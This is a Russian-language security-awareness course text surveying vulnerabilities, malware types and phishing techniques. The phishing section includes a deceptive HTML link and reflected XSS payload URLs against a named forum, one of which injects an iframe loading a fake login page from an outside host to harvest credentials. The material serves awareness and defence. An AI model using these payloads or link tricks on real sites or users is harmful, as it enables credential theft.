Безопасность и анонимность в сети - часть 2

Безопасность и анонимность в сети - часть 2

t.me/nightbiznes

Баги в безопасности и уязвимости: ландшафт уязвимостей

Кибербезопасность находится в состоянии гонки вооружений между наступательными и оборонительными возможностями, и к сожалению, мы проигрываем это сражение. Как пользователи, мы хотим лучших технологий, предоставляющих отличные возможности творить большее. Но чем больше мы имеем, чем больше мы надеемся на это, тем более сложными становятся эти системы.

Сложность - это противник безопасности. Откровенно говоря, сложность - это заклятый враг безопасности, и это одна из основных причин, почему мы проигрываем эту гонку вооружений.

Я собираюсь ввести вас в курс дела касаемо багов в безопасности и уязвимостей и как они влияют на вашу безопасность.

Баг в безопасности и уязвимость, собственно говоря, это одно и то же. Это синонимы. Если я говорю баг в безопасности или уязвимость, я имею ввиду одно и то же.

Баг - это ошибка. Ошибка, которая вписана в программное обеспечение. Источник угрозы, например, хакер, получает возможность эксплуатировать эту ошибку.

В качестве примера можно привести баг под названием Heartbleed, о котором вы, возможно, слышали из мейнстримовых новостей. Это баг в OpenSSL, который позволяет дешифровывать сетевой трафик, отправляемый на уязвимые сайты. Например, у вас есть интернет-банк. Если бы он был подвержен уязвимости Heartbleed, то при вводе ваших логина и пароля, некий злоумышленник смог бы дешифровать трафик и получить доступ к вашему логину и паролю.

Баги в безопасности будут существовать всегда, пока программное обеспечение пишет человек. Возможно, когда-то писать программы будет не человек, а пока что люди склонны ошибаться, и пока именно люди пишут софт, будут существовать и баги в безопасности.

Это и не удивительно, возьмите что-нибудь наподобие операционной системы Windows. Она содержит миллионы строчек кода. Люди склонны к ошибкам, мы будем допускать ошибки, и будут существовать баги в безопасности.

Баги в безопасности могут существовать в вашей операционной системе, фирменном программном обеспечении, приложениях, вещах типа Outlook, в вашем медиа-проигрывателе, в Adobe Acrobat. В качестве отдельной угрозы баги могут находиться в вашем браузере или в расширениях и аддонах внутри браузера.

Так, например, баг может существовать в Internet Explorer. Вы посещаете веб-сайт, на котором размещен специальный код. Вы не увидите этот код, и он установит вредоносное программное обеспечение на вашу машину и захватит управление машиной посредством этой уязвимости. Последствиями может быть, например, что злоумышленники решат зашифровать все ваши файлы и станут вымогать у вас выкуп для дешифровки файлов. Так ведут себя программы-вымогатели.

Поскольку есть вещи в сети, о которых вы заботитесь, нам нужно рассмотреть баги безопасности, которые существуют на веб-сайтах и в инфраструктуре Интернета.

Допустим, вы используете Dropbox, а Доктор Зло обнаружил баг в этом сервисе, который позволяет ему получить доступ к вашим файлам. И шифрование вас не спасет, поскольку Dropbox хранит ключи шифрования, так что у него появляется доступ к вашим файлам.

Есть два основных вида багов. Собственно, лучше всего провести различие между ними, и это будут известные и неизвестные баги.

Если мы начнем с известных багов, известных уязвимостей, то для них существуют патчи, и если вы пропатчите вашу систему, подобные баги будут вам не страшны. Мы рассмотрим самые лучшие и легкие способы патчить весь имеющийся софт, который в этом нуждается, несколько позже в этом курсе.

И далее у нас есть неизвестные баги, которые также называются уязвимостями нулевого дня. От подобных багов гораздо труднее защититься, поскольку патч еще не выпущен. Позже мы рассмотрим техники защиты от подобных багов, в индустрии безопасности они известны как компенсирующий контроль.

Начинающему мелкому хакеру даже не нужно быть сколько-нибудь опытным в наши дни. Он может купить готовый набор эксплойтов.

Например, эксплойт позволяет удаленному атакующему исполнять произвольный код при помощи подготовленного веб-сайта, на котором пользователю может быть подгружен определенный объект. На деле это означает, что если вы кликнете по ссылке или отправитесь с этого сайта куда-либо еще в браузере Internet Explorer, в котором есть данная уязвимость, то атакующие могут получить контроль над вашей машиной.

И если нам не особо хочется покупать набор эксплойтов, вы можете поискать этот эксплойт в сети. И мы видим здесь код для запуска данного эксплойта. Итак, я надеюсь, теперь вы получше представляете, что такое баги в безопасности и уязвимости.

Хакеры, крэкеры и киберпреступники

Теперь мы поговорим о текущем ландшафте угроз. Это такой способ называть неприятные вещи, которые имеются где-то там, и о которых нам нужно знать и быть обеспокоенными.

Для начала: хакер, крэкер или киберпреступник. Активный канал IRC, где продается все от кредитных карт до вредоносных программ, вирусов, хакерства как услуги. IRC, если вы не в курсе, это одна из частей Интернета. Это не сеть, а доступ в нее можно осуществить посредством IRC-клиента.

Понятие "хакер" в оригинале было положительным термином, который использовался для описания человека, который продолжает искать решение проблемы до тех пор, пока не находит его. Но сегодня распространенное понимание того, кто такой хакер - это человек, который делает что-либо нехорошее в Интернете или на вашем компьютере. Так что мы будем использовать это слово в таком понимании.

Есть люди, которые называют себя "белыми хакерами", имея ввиду, что они хакают во имя добра. В качестве примера можно привести работу, которую выполнял я сам, когда вам платят за попытки компрометации цели, например компании, и в индустрии безопасности это называется этичным хакингом или тестированием на проникновение.

Но нас будут волновать "черные хакеры", или вы можете называть их просто, киберпреступниками. Это не мамкины кулхацкеры, хакающие ради веселья и признания. Это преступники, пытающиеся сделать деньги на вас и других людях.

Есть группы хакеров или преступные организации, которые варьируются по своим размерам от маленьких до больших. Есть слабо связанные группы хакеров, которые прогуливаются по областям Дарквеб и не имеют между собой тесных связей, а только лишь связи через сеть или связи схожего морального или политического характера. И есть хакеры-одиночки.

Навыки этих людей, этих хакеров, сильно варьируются. Подавляющее большинство хакеров имеют слабые навыки и известны как скрипт-кидди, потому что все, что они могут делать - это запускать скрипты, написанные кем-то другим. Навскидку, наверное, 95% хакеров - это скрипт-кидди, но вам не следует их недооценивать. Другие 5% - это опытные и значительно более опасные хакеры.

В наши дни опытные хакеры продают свои инструменты скрипт-кидди, есть даже подпольный рынок, на котором хакерство продается как услуга, вот почему скрипт-кидди могут быть столь же опасными.

Вы можете арендовать платформу для хакинга. Если бы эти люди столько же времени тратили бы на легальный бизнес, то скорее всего, они бы весьма преуспели.

Вредоносное программное обеспечение, вирусы, руткиты и RAT

Теперь мы поговорим о вредоносных программах. Вредоносные программы - это общее понятие для всех программ, написанных со злым умыслом. Они могут включать в себя множество различных вещей. Мы рассмотрим некоторые основные виды вредоносных программ, и далее поговорим о тех из них, которым вы должны придавать особо важное значение в наше время.

Наверху этого списка макровирусы. Это вирусы, написанные на макроязыках, например на VBS, они обычно платформо-независимы, многие приложения разрешают встраивание макро-программ в документы. Эти программы могут автоматически запускаться во время открытия документа. Это означает, что, например, документы Word или Excel могут иметь встроенные макросы и VBS-скрипты, которые запускают подобные макровирусы.

Далее по списку идут стелс-вирусы, это вирусы, которые скрывают производимые ими изменения в системе. Подобные вирусы пытаются перехитрить антивирусное программное обеспечение путем перехвата своих обращений к операционной системе и предоставления ложной и фальшивой информации.

Полиморфные вирусы создают различные рабочие копии самих себя. Составные части полиморфного вируса могут различаться при каждом новом заражении, что делает очень сложным его прямое обнаружение при помощи сигнатур и антивирусного программного обеспечения.

Есть самоискажающие вирусы, которые пытаются скрыться от антивирусного ПО путем модификации своего кода таким образом, чтобы он не совпадал с предопределенными сигнатурами из антивирусных баз.

Есть Боты или Зомби, и это фактически группа взломанных устройств под командованием и управлением хакера. Так что если ваша машина скомпрометирована, она может стать "компьютером-зомби" или частью ботнета.

Есть компьютерные черви; это вирусы, которые попросту распространяются с одной машины на другую и так далее.

Есть руткиты. Руткиты - это одни из самых неприятных вредоносных программ, внедряющихся в систему, которые вы только можете заполучить. Обычно они встраиваются в ядро операционной системы. Они могут полностью скрыть свое присутствие от операционной системы.

Далее у нас есть руткиты для встроенного ПО. И это самый худший вид из всех остальных. Например, подобное вредоносное ПО может проникнуть в чип с прошивкой жесткого диска. Даже форматирование диска и переустановка операционной системы не поможет справиться с ним. Это вредоносное программное обеспечение уровня разработки АНБ или Центра правительственной связи Великобритании.

Все же, стоит отметить, что существуют обсуждения и материалы о том, как создаются подобные руткиты для встроенного ПО, так что определенно есть и хакерские группировки, умеющие их создавать.

Далее - кейлоггеры. Они регистрируют нажатия клавиш на клавиатуре или мыши.

Далее, троянские программы. Трояны - это простые программы, которые имитируют определенный вид деятельности, а на самом деле являются вредоносными. Вы можете загрузить, к примеру, какую-либо программу и она будет работать как заявлено, но в то же время, будет осуществлять вредоносные действия за вашей спиной.

Далее идут средства удаленного доступа или RAT. Это вредоносные программы, которые запускаются на вашей системе и позволяют злоумышленникам получать удаленный доступ к вашей системе. Они похожи на легальные программы удаленного администрирования, возможно, вы знакомы с программами типа Team Viewer. Можно сказать, что это Team Viewer для хакеров. Это средство для удаленного доступа.

Среди популярных сейчас можно выделить Havex, AlienSpy, ComRat. Их можно купить или скачать бесплатно.

Несмотря на то, что мы прошлись по всем этим видам вредоносных программ, вам необязательно разбираться в каждом виде. Вам лишь достаточно знать об их существовании.

Я уделю особое внимание наиболее широко распространенным вредоносным программам в настоящее время и это, во-первых, программы-вымогатели. Формы вредоносного поведения у них обычно проявляются, когда они берут ваш компьютер под свой контроль, далее втихую, скрытно зашифровывают все ваши персональные файлы, а ключ дешифрования оказывается только у хакера. Затем, когда шифрование завершается, вы получаете сообщения наподобие следующих.

CryptoWall, CTB-locker, TorrentLocker - наиболее распространенные сейчас шифровальщики. Ваши варианты - заплатить выкуп, попытаться взломать алгоритм шифрования, что вряд ли обернется успехом, или потерять свои файлы. Большинство людей платят, злоумышленники стремятся делать сумму сравнительно невысокой, чтобы люди стремились выплачивать выкуп. Обычно оплата происходит при помощи криптовалюты типа Биткойн, которую сравнительно сложно отследить.

Программы-вымогатели ввиду высокого уровня прибыльности и достаточно простой цепочки участников схемы, определенно будут стремительно развиваться в сегменте рынка персональных компьютеров в обозримом будущем.

Далее рассмотрим вредоносную рекламу, и это серьезная проблема. Вредоносная реклама - это онлайн реклама, которая скрывает в себе вредоносный код. В онлайне существует ряд крупных и не очень рекламных сетей. Например, Yahoo. Люди платят за размещение рекламы. Данная реклама будет показываться на тысячах различных веб-сайтов. Владельцы этих сайтов зачастую даже и не знают, что конкретно за реклама это будет.

Хакеры в наши дни размещают собственную рекламу, содержащую в себе определенные скрипты. Чтобы обойти проверки безопасности, эти скрипты ссылаются на другие скрипты, которые подгружают еще одни скрипты из другой локации, и затем этот процесс повторяется еще несколько раз, пока, наконец, посетитель веб-сайта не подхватывает вредоносную программу.

Рекламным сетям трудно определять, является ли реклама вредоносной или нет, вследствие подобных цепочек скриптов из разных меняющихся локаций.

И к тому же, многие такие рекламные объявления размещаются при помощи автоматических процессов. Вдобавок, сайты могут иметь свою собственную рекламную сеть, например, Forbes, который не так давно хостил вредоносное программное обеспечение на своем сайте. Так что, вредоносная реклама - это развивающийся вектор атаки, о котором вы должны быть предупреждены.

И далее у нас по списку идут Drive-by атаки. Довольно-таки странное название для простого посещения веб-сайта, содержащего код эксплойта для атаки на вашу тачку.

В общем, не рассчитывайте на безопасность даже когда посещаете только лишь хорошо знакомые веб-сайты. Вредоносная реклама - лишь одна из причин. Вам также нужно брать в расчет тот факт, что сам веб-сайт может быть скомпрометирован.

Шпионское программное обеспечение, рекламное ПО, лже-антивирусы, потенциально нежелательные программы, угон браузеров

Итак, продолжаем изучать виды вредоносного программного обеспечения. На очереди у нас шпионское программное обеспечение. Как видно из названия, его основная цель состоит в сборе информации и отправке ее атакующим, ну или шпионам. Атакующие в целом не хотят нанести прямой ущерб, их целью является компрометация вашей приватности или анонимности в зависимости от их намерений. Шпионское ПО - это вредоносные программы для сбора разведывательной информации. Корпорации и хакерские группировки могут создавать шпионское ПО, также как и правительства стран.

Кстати, не заморачивайтесь особо насчет названий и классификации вредоносных программ, которые мы упомянули ранее. Это не строгая классификация.

Например, руткит может быть также и троянцем, а кто-то может называть шпионскую программу вирусом. Главное здесь понять, какие варианты существуют и потенциальное предназначение этих вредоносных программ.

Далее у нас идет рекламное программное обеспечение или Adware. Некоторые люди считают его разновидностью вредоносного ПО. Это программы, которые без вашего на то согласия, принудительно показывают рекламу. Существуют миллионы различных вариантов подобных программ. Одной из наиболее раздражающих и деструктивных форм рекламного ПО является Cool Web Search. Возможно, вы сталкивались с ней на собственном опыте и убедились, что в ней нет ничего прикольного.

Она захватывает позицию вашей поисковой системы по умолчанию, отображает рекламу в браузере, когда вы нажимаете на ссылки, может перенаправлять вас на сторонние сайты, а также активно защищает себя от удаления и сноса. Довольно-таки трудно избавиться от нее. И есть множество других примеров рекламного ПО, затронувшего миллионы людей.

Когда рекламные или вредоносные программы берут под свой контроль ваш браузер подобным образом, это называется угоном браузера, и вы услышите этот термин далее в курсе.

Вам всегда следует быть внимательными при установке программного обеспечения, потому что зачастую во время установки могут содержаться дополнительные соглашения на установку программ, типа угонщиков браузеров, о которых мы упомянули. И что это за установки? Потенциально это может быть рекламное ПО. Так что будьте внимательны, что именно вы соглашаетесь установить.

Всегда открывайте выборочную установку и убирайте все незнакомые пункты, особенно если это дополнительное программное обеспечение, которое вы изначально не планировали скачивать и устанавливать. Совершенно очевидно, что вам не следует устанавливать программы, которым вы не доверяете.

Иногда случается, что рекламное ПО оказывается предустановленным на ваше устройство. Одним из лучших примеров является случай, когда Lenovo предустанавливала рекламную программу Superfish, которая не только поставляла пользователям рекламу на основе собираемых ею данных, но и обладала самоподписанным сертификатом, позволяющим обходить TLS- и SSL-шифрование в вашем браузере. Не очень-то классный ход от Lenovo. По факту, я никогда не стану приобретать ноутбук или какие-либо другие девайсы от Lenovo из-за того случая, а также других вещей, которые исполняет эта компания.

Далее по списку идут лжеантивирусы. Это метод атаки с применением техники социальной инженерии, когда атакующие пытаются обмануть пользователя, заставив поверить в угрозу, которой на самом деле нет. Типовой пример: фейковая защитная программа, утверждающая, что ваш компьютер заражен вредоносными программами или что-нибудь наподобие этого. Как правило, они предлагают вам совершить оплату в обмен на решение фейковой проблемы. Подобное мошенничество оказывается невероятно успешным.

Программа под названием "Персональный антивирус" находит все эти фейковые уязвимости. А далее она начнет открывать всплывающие окна, начнет вызывать проблемы на машине и потом люди оказываются одураченными, оплачивая удаление фейковых вирусов.

И напоследок, у нас тут собирательный термин. Если речь идет о чем-то нежелательном, то это можно назвать Потенциально нежелательными программами.

Они называются потенциально нежелательными, потому что антивирусные компании и люди, пытающиеся удалить их, не уверены, нужны ли эти программы или нет.

Как правило, они вам не нужны.

Они раздражают; это вещи, которые идут в связке с устанавливаемым программным обеспечением. То есть вы устанавливаете какую-либо программу и во время установки вам пытаются подсунуть что-то еще, так что убедитесь в том, что вы открыли меню установки дополнительного ПО и удалили оттуда любые нежелательные вещи.

Что такое фишинг, вишинг, смишинг?

Фишинг - это вид атаки, при которой обычно пытаются склонить жертву к переходу по определенной ссылке или запуску вредоносного программного обеспечения.

Это может быть попытка скомпрометировать устройство жертвы для кражи критичной информации, паролей, логинов, ПИН-кодов, данных кредитной карты, а также попытка получения доступа к онлайн-аккаунтам жертвы. Практически все вещи, которых вы избегаете, могут произойти при помощи фишинговых атак.

И фишинг является одним из самых успешных и распространенных видов атак, поскольку его легко организовать, дешево настраивать и он приносит атакующим хорошую прибыль. Вам реально следует быть готовыми к таким атакам.

Я работал на большие корпорации, в которых даже несмотря на повторяющиеся тренинги по безопасности для информирования людей, какую бы компанию я ни консультировал, порядка 30% людей продолжают попадаться на удочку злоумышленников и кликают на вещи, на которые кликать не должны.

Фишинг обычно производится посредством отправки фейковых имейлов или мгновенных сообщений. Они направляют жертву на фейковый сайт, который зачастую напоминает легитимный сайт. Это форма социальной инженерии, или другими словами, это атака на человеческие слабости. И она помимо всего прочего основывается на неизбежной нехватке средств защиты веб-технологий от подобного рода человеческих уязвимостей.

Например, обычное электронное письмо не позволяет определить подлинность или проверить цифровую подпись отправителя. Так что нет гарантии, от кого оно пришло.

Если бы такая гарантия была, то подобной проблемы бы не возникало. Поскольку электронные письма могут быть легко подделаны так, словно они отправлены легитимным отправителем, фишинговые атаки используют то доверие, которое вы оказываете отправителю письма.

В целом, фишинговые атаки производятся в массовом порядке, отправляются тысячи или миллионы электронных писем, на адреса электронной почты, собранные в Интернете, иногда на хакерских веб-сайтах, иногда на форумах, где эти адреса публично раскрыты их владельцами, а иногда даже на предполагаемые адреса в попытке достучаться до цели.

Если бы у вас был, например, адрес john@hotmail или что-то наподобие этого, то подобный адрес было бы невозможно использовать из-за обилия спама и фишинговых писем, которые бы сыпались на этот адрес, поскольку спамеры атакуют типовые адреса в комбинации с доменными именами. Массовые имейл-атаки также идут и на адреса в определенных сферах бизнеса.

Если это целевая, адресная атака, то мы называем ее целевым фишингом. Атака нацелена индивидуально на одну жертву.

Давайте посмотрим на некоторые техники проведения фишинговых атак, цель которых попытаться убедить жертв кликнуть на определенные объекты.

Очень распространенная техника - это использование так называемых манипуляций со ссылками. Перед вами простое фишинговое электронное письмо. Я отправил его на свой "технический ящик электронной почты, чтобы продемонстрировать вам используемые техники.

Здесь я создал фейковые ссылки на Google и Microsoft. Давайте увеличим масштаб. Итак, первая техника, которую используют злоумышленники, это субдомены и домены с опечатками. Взгляните на эти три примера, красным цветом я выделяю реальный домен, на который мы попадем при переходе по ссылке, а синим цветом я выделяю субдомен, который пытается нас убедить, что при переходе по ссылке мы попадем именно на него.

И немного другая техника используется в следующем примере. Итак, красным цветом я выделяю реальный домен, а синим цветом я выделяю использование субдиректории таким образом, чтобы жертве казалось, что ссылка ведет на Google. Первая техника использует субдомены, вторая использует субдиректории.

А третий пример, с Microsoft. Обратите внимание, что с ним не так? Полагаю, вам сейчас легко это сделать, потому что мы увеличили масштаб отображения. Здесь стоят буквы R и N вместо M. Теперь давайте взглянем на другие примеры.

Это реальные фишинговые ссылки, которые прямо сейчас пытаются убедить людей проследовать по ним. Вот здесь вы можете увидеть, собственно говоря, название австралийского банка и эта ссылка пытается убедить людей, что она ведет на домен nabbank.com.au Хотя на самом деле, вот здесь, мы видим, что реальный домен это solmistico.com

Давайте поищем, есть ли тут какие-нибудь другие хитрые примеры, хотя нет, не такие уж они и хитрые, и тем не менее, давайте попробуем найти здесь что-то еще.

Вот здесь вы можете увидеть другой пример, Paypal.co.uk Итак, реальный домен - это bukafa.com В зависимости от вашего опыта, вам может быть нелегко распознавать реальные домены.

В общем, реальный домен - это домен, который находится слева от домена верхнего уровня. В данном примере домен верхнего уровня - это ".com" Слева от него нет знака слеш. Домены верхнего уровня - это, например, ".com", ".net", ".org"

Если вы посмотрите на самые первые примеры вот здесь, то эти ссылки не легитимны, поскольку перед "google.com" стоит слеш, что означает, что это всего лишь субдиректория. Реальный домен - это домен слева от домена верхнего уровня и который не имеет слеша по левую сторону от себя. В этой ссылке перед доменом google.com есть слеш, так что реальный домен - stationx.net

Следующий пример техники манипуляции со ссылками - это так называемая омографическая атака на интернационализированные доменные имена. IDN - это стандарт интернационализированных доменных имен. Здесь мы видим пару банальных примеров, но опять же, они могут быть и сложнее. Здесь видим нули вместо букв "O", здесь единицу вместо буквы " L".

Могу вас заверить, что если шрифт будет другим, то подобные вещи практически невозможно будет различить. И конечно, чтобы внести еще большую путаницу, это может быть использовано в комбинации с субдоменами и опечатками.

Следующий пример - это скрытые URL-адреса. Использование HTML-тегов <a> для сокрытия реального URL. У нас тут ссылка с текстом "Нажми сюда", вы не знаете, что за ней. Если посмотреть в нижнюю часть страницы, то можно заметить, что ссылка ведет на Google.com.stationx.net

Следующая ссылка - можем заметить, что она ведет не на google.com, а на Google.com.stationx.net

<h4>Hidden URLs</h4><a href=”http://google.com.stationx.net”>Click Here</a> <br><a href=”http://google.com.stationx.net”>http://google.com.stationx.net</a>

Нажимаю на эту ссылку, видите, я попал совершенно не на сайт Google. Очевидно, что это мог бы быть сайт для атаки. Как работают эти скрытые ссылки? По факту, это всего лишь HTML. Это совершенно не сложно.

Здесь мы видим сырой HTML-код, при помощи которого были созданы фишинговые ссылки из нашего имейла. В наши дни электронные письма создаются при помощи HTML. Клиенты электронной почты отображают HTML так-же, как и браузеры.

И конечно, если использовать все подобные варианты комбинированно - это и есть причина, по которой людей можно обмануть, почему они кликают на подобные ссылки. Легко понять, почему людей можно обмануть. Я имею ввиду, что здесь так много разной хрени, что обычные любители не разберутся в ней и будут кликать по этим ссылкам.

Вернемся к нашему письму, наведем курсор на ссылку, нажмем правой кнопкой мыши и скопируем адрес ссылки. Теперь в зависимости от браузера это покажет корректный URL, но не всегда. JavaScript может прятать ссылку в зависимости от вашего почтового клиента. Как я уже показывал, вы можете навести курсор на ссылку и в левом нижнем углу увидите реальный домен. Но так происходит не всегда, это зависит от вашего почтового клиента и JavaScript. К тому же, это можно подделать, так что вещь довольно-таки хитрая. Вы можете посмотреть на HTML-код. Некоторые имейл-клиенты позволяют смотреть сырой HTML, и тогда вы можете найти ссылку и посмотреть, куда она ведет. Но некоторые клиенты не позволяют делать этого. Я имею ввиду, что, например, в данном электронном письме я не могу увидеть HTML. Так что мне приходится наводить курсор на ссылки и смотреть, куда они ведут.

Хорошие провайдеры заметят подобные вещи и изменят их. Это и хорошо, и плохо.

Например, в Thunderbird подобные ссылки не пройдут. Он изменит их, так что вы увидите, куда они ведут. Но этот защитный механизм можно обойти, так что это не панацея. Я не прикладывал никаких усилий, чтобы обойти какую-либо антифишинговую защиту "технической" почты из нашего примера, она смогла получить эти ссылки и отобразила их именно так.

Помимо манипуляций с URL-адресами существуют скрытые перенаправления URL-адресов, которые используют уязвимости к межсайтовому скриптингу или межсайтовой подделке запроса. Манипуляции с адресами можно комбинировать с этими видами уязвимостей.

Возможна ситуация, когда вы получаете ссылку на реальный сайт, который настроен таким образом, чтобы произвести на вас какую-либо атаку. Итак, атакующий может найти или уже нашел слабое место в реальном сайте и для совершения атаки на вас использует технику типа "Открытое перенаправление" или, как я только что упомянул, уязвимости к межсайтовому скриптингу или межсайтовой подделке запроса. Допустим, это произошло с PayPal и многими другими сайтами.

Давайте я приведу пример. Очевидно, что вы хотите держаться подальше от отраженных XSS-уязвимостей, которые могут быть использованы в фишинговой атаке. Итак, представим, что вам отправили ссылку.

Собственно говоря, это XSS-уязвимость, которую я обнаружил на одном форуме. Я использую ее в качестве примера. Это образец URL-адреса.

www.gossamer-threads.com/form/user.cgi?url=”><script>alert(“XSSvulnerability”)</sc...

Вы кликаете на этот URL. Он ведет вас на веб-сайт. Поскольку я вставил в этот URL специальный скрипт, то когда вы введете свои логин и пароль, я смогу украсть их.

Теперь смотрите, вот критичная часть кода. Я вставил свой небольшой фрагмент кода сюда. Это и называется уязвимостью к подделке межсайтового запроса.

..ds.com/forum/user.cgi?url=”><script>alert(“XSSvulnerability”)</script>”&from=rate...

Этот сайт не должен был позволить мне вставлять мои собственные скрипты в URL-адреса и обрабатывать их, потому что в этом случае я могу действовать от лица этого сайта в контексте безопасности этого сайта. Это означает, что я могу получить доступ к вашим куки-файлам, и конечно, я могу манипулировать веб-страницей, вместо настоящего экрана авторизации подставить фейковый экран авторизации, который я специально подготовил. Именно это я и сделал при помощи данной уязвимости, чтобы продемонстрировать это владельцам веб-приложения и они смогли пофиксить проблему. Это была уязвимость URL.

.../user.cgi?url=”><iframe%20src=”http://www.stationx.net/linksql.html%20scrolling=”No”%20align=”MIDDLE”%20width=”100%”%20height=”3000”&20frameborder=”No”></iframe><!--&from=rate

Давайте теперь посмотрим сюда. Здесь я вставляю так называемый iframe, чтобы создать фейковый экран авторизации и иметь возможность забирать логины и пароли.

Это в качестве примера для вас.

Если в вебсайте есть уязвимости, подобные XSS-уязвимости, или открытые перенаправления, то фишинговые атаки могут быть еще опаснее.

И чтобы закончить с фишингом, поговорим о паре вариантов фишинга, а именно о вишинге и смишинге. Итак, вишинг - это телефонный или голосовой фишинг, а смишинг - это СМС-фишинг или отправка текстовых сообщений.

Это попытка позвонить вам или отправить вам СМС-сообщение с целью компрометации вашего устройства, таким же образом, как это происходит при фишинге. Это приводит к краже критичной информации, паролей, логинов, кредитных карт, всякие такие нехорошие вещи.

Есть множество примеров, один из распространенных - когда злоумышленник представляется сотрудником Microsoft, сообщает вам, что на вашей машине вирус, может ли он помочь, пожалуйста, загрузите и установите эту абсолютно легитимную программу, которая затем оказывается трояном или чем-нибудь типа того.

Говорю вам, даже моя матушка несколько раз получала такие звонки от чувачков из Индии, которые представлялись сотрудниками Microsoft. Такие звонки срабатывают на многих людях. Именно поэтому злоумышленники продолжают заниматься подобным мошенничеством.

Посмотрите на YouTube, есть много пранков, когда разыгрывают таких вот злоумышленников. На это весьма забавно смотреть. Итак, вишинг - это мошенничество, основанное на телефонии. Смишинг - это мошенничество, основанное на текстовых сообщениях. Все это и называется фишингом.